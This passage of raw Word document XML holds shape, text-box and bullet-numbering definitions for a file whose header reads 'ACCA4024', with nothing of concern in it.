              <v:shape id="Shape 11618" o:spid="_x0000_s1238" style="position:absolute;left:91;width:17191;height:2773;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="1719072,2773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4ZYsUA&#10;AADeAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWsCMRCF70L/QxihN81uoVJWo4goFE+t9eBx2Iy7&#10;wWSy3aTr+u87h0JvM7w3732z2ozBq4H65CIbKOcFKOI6WseNgfPXYfYGKmVkiz4yGXhQgs36abLC&#10;ysY7f9Jwyo2SEE4VGmhz7iqtU91SwDSPHbFo19gHzLL2jbY93iU8eP1SFAsd0LE0tNjRrqX6dvoJ&#10;Bg57d0nef39sHT2OIeTrcf86GPM8HbdLUJnG/G/+u363gl8uSuGVd2QGv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ThlixQAAAN4AAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMv&#10;ZG93bnJldi54bWxQSwUGAAAAAAQABAD1AAAAigMAAAAA&#10;" path="m,l1719072,r,277368l,277368,,e" fillcolor="#933634" stroked="f" strokeweight="0">
                <v:stroke miterlimit="83231f" joinstyle="miter"/>
                <v:path arrowok="t" textboxrect="0,0,1719072,277368"/>
              </v:shape>
              <v:shape id="Shape 11619" o:spid="_x0000_s1239" style="position:absolute;left:822;top:609;width:15728;height:1707;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="1572768,170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Pv5sMA&#10;AADeAAAADwAAAGRycy9kb3ducmV2LnhtbERP32vCMBB+F/wfwg32pmmFFVeNMpSCT4I6xh7P5myK&#10;zaUkUet/vwwGe7uP7+ct14PtxJ18aB0ryKcZCOLa6ZYbBZ+najIHESKyxs4xKXhSgPVqPFpiqd2D&#10;D3Q/xkakEA4lKjAx9qWUoTZkMUxdT5y4i/MWY4K+kdrjI4XbTs6yrJAWW04NBnvaGKqvx5tV8PZd&#10;+U1h8nlffe0r7HanQ3beKvX6MnwsQEQa4r/4z73TaX5e5O/w+066Qa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0Pv5sMAAADeAAAADwAAAAAAAAAAAAAAAACYAgAAZHJzL2Rv&#10;d25yZXYueG1sUEsFBgAAAAAEAAQA9QAAAIgDAAAAAA==&#10;" path="m,l1572768,r,170688l,170688,,e" fillcolor="#933634" stroked="f" strokeweight="0">
                <v:stroke miterlimit="83231f" joinstyle="miter"/>
                <v:path arrowok="t" textboxrect="0,0,1572768,170688"/>
              </v:shape>
              <v:rect id="Rectangle 10575" o:spid="_x0000_s1240" style="position:absolute;left:5715;top:883;width:7917;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bLTMQA&#10;AADeAAAADwAAAGRycy9kb3ducmV2LnhtbERPS4vCMBC+C/sfwix403QFX12jyKro0Rfo3oZmti3b&#10;TEoTbfXXG0HwNh/fcyazxhTiSpXLLSv46kYgiBOrc04VHA+rzgiE88gaC8uk4EYOZtOP1gRjbWve&#10;0XXvUxFC2MWoIPO+jKV0SUYGXdeWxIH7s5VBH2CVSl1hHcJNIXtRNJAGcw4NGZb0k1Hyv78YBetR&#10;OT9v7L1Oi+Xv+rQ9jReHsVeq/dnMv0F4avxb/HJvdJgf9Yd9eL4TbpD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E2y0zEAAAA3gAAAA8AAAAAAAAAAAAAAAAAmAIAAGRycy9k&#10;b3ducmV2LnhtbFBLBQYAAAAABAAEAPUAAACJAwAAAAA=&#10;" filled="f" stroked="f">
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w:rsidR="00C416A1" w:rsidRDefault="00C416A1">
                      <w:r>
                        <w:rPr>
                          <w:color w:val="FFFFFF"/>
                        </w:rPr>
                        <w:t>ACCA4024</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:rect>
              <v:rect id="Rectangle 10576" o:spid="_x0000_s1241" style="position:absolute;left:11658;top:883;width:422;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RVO8QA&#10;AADeAAAADwAAAGRycy9kb3ducmV2LnhtbERPS4vCMBC+L/gfwgje1lRBV6tRRF306AvU29CMbbGZ&#10;lCba7v76jbDgbT6+50znjSnEkyqXW1bQ60YgiBOrc04VnI7fnyMQziNrLCyTgh9yMJ+1PqYYa1vz&#10;np4Hn4oQwi5GBZn3ZSylSzIy6Lq2JA7czVYGfYBVKnWFdQg3hexH0VAazDk0ZFjSMqPkfngYBZtR&#10;ubhs7W+dFuvr5rw7j1fHsVeq024WExCeGv8W/7u3OsyPBl9DeL0TbpC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kVTvEAAAA3gAAAA8AAAAAAAAAAAAAAAAAmAIAAGRycy9k&#10;b3ducmV2LnhtbFBLBQYAAAAABAAEAPUAAACJAwAAAAA=&#10;" filled="f" stroked="f">
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w:rsidR="00C416A1" w:rsidRDefault="00C416A1">
                      <w:r>
                        <w:rPr>
                          <w:color w:val="FFFFFF"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> </w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:rect>
              <v:rect id="Rectangle 10577" o:spid="_x0000_s1242" style="position:absolute;left:56677;top:762;width:458;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jwoMUA&#10;AADeAAAADwAAAGRycy9kb3ducmV2LnhtbERPTWvCQBC9F/wPywi91Y1CG01dRbQlObZR0N6G7JgE&#10;s7MhuzXRX98tFHqbx/uc5XowjbhS52rLCqaTCARxYXXNpYLD/v1pDsJ5ZI2NZVJwIwfr1ehhiYm2&#10;PX/SNfelCCHsElRQed8mUrqiIoNuYlviwJ1tZ9AH2JVSd9iHcNPIWRS9SIM1h4YKW9pWVFzyb6Mg&#10;nbebU2bvfdm8faXHj+Nit194pR7Hw+YVhKfB/4v/3JkO86PnOIbfd8IN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qPCgxQAAAN4AAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMv&#10;ZG93bnJldi54bWxQSwUGAAAAAAQABAD1AAAAigMAAAAA&#10;" filled="f" stroked="f">
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w:rsidR="00C416A1" w:rsidRDefault="00C416A1">
                      <w:r>
                        <w:rPr>
                          <w:color w:val="76923B"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> </w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:rect>
              <v:shape id="Shape 11620" o:spid="_x0000_s1243" style="position:absolute;left:91;width:17191;height:457;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="1719072,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uWx8YA&#10;AADeAAAADwAAAGRycy9kb3ducmV2LnhtbESPQW/CMAyF75P4D5GRdhtp0WBTR0AIjYkDF9gOO3qN&#10;11Q0Tmmy0v17fEDiZsvP771vsRp8o3rqYh3YQD7JQBGXwdZcGfj63D69gooJ2WITmAz8U4TVcvSw&#10;wMKGCx+oP6ZKiQnHAg24lNpC61g68hgnoSWW22/oPCZZu0rbDi9i7hs9zbK59lizJDhsaeOoPB3/&#10;vIF+7/rIePh4+TnX+ezbvm/L58yYx/GwfgOVaEh38e17Z6V+Pp8KgODIDHp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auWx8YAAADeAAAADwAAAAAAAAAAAAAAAACYAgAAZHJz&#10;L2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA9QAAAIsDAAAAAA==&#10;" path="m,l1719072,r,45720l,45720,,e" fillcolor="#933634" stroked="f" strokeweight="0">
                <v:stroke miterlimit="83231f" joinstyle="miter"/>
                <v:path arrowok="t" textboxrect="0,0,1719072,45720"/>
              </v:shape>
              <v:shape id="Shape 11621" o:spid="_x0000_s1244" style="position:absolute;left:91;top:2316;width:17191;height:457;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="1719072,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zXMQA&#10;AADeAAAADwAAAGRycy9kb3ducmV2LnhtbERPO2vDMBDeC/kP4gLZatkmL9woJpSmZOiSpEPHi3W1&#10;TKyTa6mO+++rQiHbfXzP25SjbcVAvW8cK8iSFARx5XTDtYL38/5xDcIHZI2tY1LwQx7K7eRhg4V2&#10;Nz7ScAq1iCHsC1RgQugKKX1lyKJPXEccuU/XWwwR9rXUPd5iuG1lnqZLabHh2GCwo2dD1fX0bRUM&#10;b2bwjMfX1eWryRYf+mVfzVOlZtNx9wQi0Bju4n/3Qcf52TLP4O+deIP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nM1zEAAAA3gAAAA8AAAAAAAAAAAAAAAAAmAIAAGRycy9k&#10;b3ducmV2LnhtbFBLBQYAAAAABAAEAPUAAACJAwAAAAA=&#10;" path="m,l1719072,r,45720l,45720,,e" fillcolor="#933634" stroked="f" strokeweight="0">
                <v:stroke miterlimit="83231f" joinstyle="miter"/>
                <v:path arrowok="t" textboxrect="0,0,1719072,45720"/>
              </v:shape>
              <v:shape id="Shape 11622" o:spid="_x0000_s1245" style="position:absolute;top:2773;width:17282;height:91;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="172821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wm9sIA&#10;AADeAAAADwAAAGRycy9kb3ducmV2LnhtbERP32vCMBB+H/g/hBN8m2nrEOmMUgTRtzHd3s/mTMua&#10;S2mipvvrl8Fgb/fx/bz1NtpO3GnwrWMF+TwDQVw73bJR8HHeP69A+ICssXNMCkbysN1MntZYavfg&#10;d7qfghEphH2JCpoQ+lJKXzdk0c9dT5y4qxsshgQHI/WAjxRuO1lk2VJabDk1NNjTrqH663SzCvjz&#10;PFb5vjrEl8U12reLGb9zo9RsGqtXEIFi+Bf/uY86zc+XRQG/76Qb5O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Cb2wgAAAN4AAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMvZG93&#10;bnJldi54bWxQSwUGAAAAAAQABAD1AAAAhwMAAAAA&#10;" path="m,l1728216,r,9144l,9144,,e" fillcolor="#933634" stroked="f" strokeweight="0">
                <v:stroke miterlimit="83231f" joinstyle="miter"/>
                <v:path arrowok="t" textboxrect="0,0,1728216,9144"/>
              </v:shape>
              <v:shape id="Shape 11623" o:spid="_x0000_s1246" style="position:absolute;left:17190;top:2773;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QcOMUA&#10;AADeAAAADwAAAGRycy9kb3ducmV2LnhtbERPS2vCQBC+F/wPywi91U1sUYmuQYVCKBTq49DjNDsm&#10;wexs3F1N+u+7hUJv8/E9Z5UPphV3cr6xrCCdJCCIS6sbrhScjq9PCxA+IGtsLZOCb/KQr0cPK8y0&#10;7XlP90OoRAxhn6GCOoQuk9KXNRn0E9sRR+5sncEQoaukdtjHcNPKaZLMpMGGY0ONHe1qKi+Hm1HQ&#10;XSv3efV6y1+3j7c5JwUN7y9KPY6HzRJEoCH8i//chY7z09n0GX7fiTfI9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VBw4xQAAAN4AAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMv&#10;ZG93bnJldi54bWxQSwUGAAAAAAQABAD1AAAAigMAAAAA&#10;" path="m,l9144,r,9144l,9144,,e" fillcolor="black" stroked="f" strokeweight="0">
                <v:stroke miterlimit="83231f" joinstyle="miter"/>
                <v:path arrowok="t" textboxrect="0,0,9144,9144"/>
              </v:shape>
              <v:shape id="Shape 11624" o:spid="_x0000_s1247" style="position:absolute;left:17251;top:2773;width:40158;height:91;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="401575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ZinsMA&#10;AADeAAAADwAAAGRycy9kb3ducmV2LnhtbERPTUvDQBC9C/6HZQRvdpMgoaTdFqtIxZutkR6H7DQJ&#10;zc6G3bGN/94VhN7m8T5nuZ7coM4UYu/ZQD7LQBE33vbcGvjcvz7MQUVBtjh4JgM/FGG9ur1ZYmX9&#10;hT/ovJNWpRCOFRroRMZK69h05DDO/EicuKMPDiXB0Gob8JLC3aCLLCu1w55TQ4cjPXfUnHbfzkDY&#10;bLbY1C/b93yQVsq6OIz6y5j7u+lpAUpokqv43/1m0/y8LB7h7510g17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YZinsMAAADeAAAADwAAAAAAAAAAAAAAAACYAgAAZHJzL2Rv&#10;d25yZXYueG1sUEsFBgAAAAAEAAQA9QAAAIgDAAAAAA==&#10;" path="m,l4015753,r,9144l,9144,,e" fillcolor="black" stroked="f" strokeweight="0">
                <v:stroke miterlimit="83231f" joinstyle="miter"/>
                <v:path arrowok="t" textboxrect="0,0,4015753,9144"/>
              </v:shape>
              <w10:wrap type="square" anchorx="page" anchory="page"/>
            </v:group>
          </w:pict>
        </mc:Fallback>
      </mc:AlternateContent>
    </w:r>
  </w:p>
  <w:p w:rsidR="00112181" w:rsidRDefault="00112181">
    <w:pPr>
      <w:spacing w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w: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181" w:rsidRDefault="0011218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042EC9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2110B634"/>
    <w:lvl w:ilvl="0" w:tplc="96802906">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7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42BED0E4">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="144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758843C0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="21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AEA458F8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="28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7F568F56">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="360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50309180">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="432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407057DC">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="50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F5A8F51A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="57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854A0C48">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="648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1">
    <w:nsid w:val="2B46504C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="80BE8F40"/>
    <w:lvl w:ilvl="0" w:tplc="F4D2D1D2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:eastAsia="Wingdings" w:hAnsi="Wingdings" w:cs="Wingdings"/>
        <w:b w:val="0"/>
        <w:i w:val="0"/>
        <w:strike w:val="0"/>
        <w:dstrike w:val="0"/>
        <w:color w:val="FF0000"/>
        <w:sz w:val="24"/>
        <w:u w:val="none" w:color="000000"/>
        <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:vertAlign w:val="baseline"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="E528F50A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:eastAsia="Wingdings" w:hAnsi="Wingdings" w:cs="Wingdings"/>
        <w:b w:val="0"/>
        <w:i w:val="0"/>
        <w:strike w:val="0"/>
        <w:dstrike w:val="0"/>
        <w:color w:val="FF0000"/>
        <w:sz w:val="24"/>
        <w:u w:val="none" w:color="000000"/>
        <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:vertAlign w:val="baseline"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="0672A5A4">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:eastAsia="Wingdings" w:hAnsi="Wingdings" w:cs="Wingdings"/>
        <w:b w:val="0"/>
        <w:i w:val="0"/>
        <w:strike w:val="0"/>
        <w:dstrike w:val="0"/>
        <w:color w:val="FF0000"/>
        <w:sz w:val="24"/>
        <w:u w:val="none" w:color="000000"/>
        <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:vertAlign w:val="baseline"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="1DAA5C80">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:eastAsia="Wingdings" w:hAnsi="Wingdings" w:cs="Wingdings"/>
        <w:b w:val="0"/>
        <w:i w:val="0"/>
        <w:strike w:val="0"/>
        <w:dstrike w:val="0"/>
        <w:color w:val="FF0000"/>
        <w:sz w:val="24"/>
        <w:u w:val="none" w:color="000000"/>
        <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:vertAlign w:val="baseline"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="03A4FB74">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:eastAsia="Wingdings" w:hAnsi="Wingdings" w:cs="Wingdings"/>
        <w:b w:val="0"/>
        <w:i w:val="0"/>
        <w:strike w:val="0"/>
        <w:dstrike w:val="0"/>
        <w:color w:val="FF0000"/>
        <w:sz w:val="24"/>
        <w:u w:val="none" w:color="000000"/>
        <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:vertAlign w:val="baseline"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="1A56A8B2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:eastAsia="Wingdings" w:hAnsi="Wingdings" w:cs="Wingdings"/>
        <w:b w:val="0"/>
        <w:i w:val="0"/>
        <w:strike w:val="0"/>
        <w:dstrike w:val="0"/>
        <w:color w:val="FF0000"/>
        <w:sz w:val="24"/>
        <w:u w:val="none" w:color="000000"/>
        <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:vertAlign w:val="baseline"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="3FA06AA4">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:eastAsia="Wingdings" w:hAnsi="Wingdings" w:cs="Wingdings"/>
        <w:b w:val="0"/>
        <w:i w:val="0"/>
        <w:strike w:val="0"/>
        <w:dstrike w:val="0"/>
        <w:color w:val="FF0000"/>
        <w:sz w:val="24"/>
        <w:u w:val="none" w:color="000000"/>
        <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:vertAlign w:val="baseline"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="72D27DB4">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:eastAsia="Wingdings" w:hAnsi="Wingdings" w:cs="Wingdings"/>
        <w:b w:val="0"/>
        <w:i w:val="0"/>
        <w:strike w:val="0"/>
        <w:dstrike w:val="0"/>
        <w:color w:val="FF0000"/>
        <w:sz w:val="24"/>
        <w:u w:val="none" w:color="000000"/>
        <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:vertAlign w:val="baseline"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="096E396C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:eastAsia="Wingdings" w:hAnsi="Wingdings" w:cs="Wingdings"/>
        <w:b w:val="0"/>
        <w:i w:val="0"/>
        <w:strike w:val="0"/>
        <w:dstrike w:val="0"/>
        <w:color w:val="FF0000"/>
        <w:sz w:val="24"/>
        <w:u w:val="none" w:color="000000"/>
        <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:vertAlign w:val="baseline"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2">
    <w:nsid w:val="331859E9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="02A252FE"/>
    <w:lvl w:ilvl="0" w:tplc="755CB000">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720"/>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1" w:tplc="8F86A1E6">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        <w:b w:val="0"/>
        <w:i w:val="0"/>
        <w:strike w:val="0"/>
        <w:dstrike w:val="0"/>
        <w:color w:val="000000"/>
        <w:sz w:val="24"/>
        <w:u w:val="none" w:color="000000"/>
        <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:vertAlign w:val="baseline"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="833E89EE">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160"/>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3" w:tplc="FA5EB15A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880"/>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4" w:tplc="72D4C5BE">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600"/>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5" w:tplc="AA4E0780">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320"/>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6" w:tplc="26FE2DC0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040"/>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7" w:tplc="8D404E2E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760"/>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8" w:tplc="AD2CE6AE">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480"/>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abstractNum>
  <w:abstractNum w:abstractNumId="3">
    <w:nsid w:val="336271AA"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C0C25686"/>
    <w:lvl w:ilvl="0" w:tplc="E8024E6C">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1425"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        <w:b/>
        <w:i/>
        <w:strike w:val="0"/>
        <w:dstrike w:val="0"/>
        <w:color w:val="000000"/>
        <w:sz w:val="24"/>
        <w:u w:val="none" w:color="000000"/>
        <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:vertAlign w:val="baseline"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="EAF2D278">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1800"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        <w:b/>
        <w:i/>
        <w:strike w:val="0"/>
        <w:dstrike w:val="0"/>
        <w:color w:val="000000"/>
        <w:sz w:val="24"/>
        <w:u w:val="none" w:color="000000"/>
        <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:vertAlign w:val="baseline"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="D7F2E570">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        <w:b/>
        <w:i/>
        <w:strike w:val="0"/>
        <w:dstrike w:val="0"/>
        <w:color w:val="000000"/>
        <w:sz w:val="24"/>
        <w:u w:val="none" w:color="000000"/>
        <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:vertAlign w:val="baseline"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="B61CEB9C">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        <w:b/>
        <w:i/>
        <w:strike w:val="0"/>
        <w:dstrike w:val="0"/>
        <w:color w:val="000000"/>
        <w:sz w:val="24"/>
        <w:u w:val="none" w:color="000000"/>
        <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:vertAlign w:val="baseline"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="5932554A">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        <w:b/>
        <w:i/>
        <w:strike w:val="0"/>
        <w:dstrike w:val="0"/>
        <w:color w:val="000000"/>
        <w:sz w:val="24"/>
        <w:u w:val="none" w:color="000000"/>
        <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:vertAlign w:val="baseline"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="7B9A5598">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        <w:b/>
        <w:i/>
        <w:strike w:val="0"/>
        <w:dstrike w:val="0"/>
        <w:color w:val="000000"/>
        <w:sz w:val="24"/>
        <w:u w:val="none" w:color="000000"/>
        <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:vertAlign w:val="baseline"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="FC6C67DE">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760"/>
      </w:pPr>
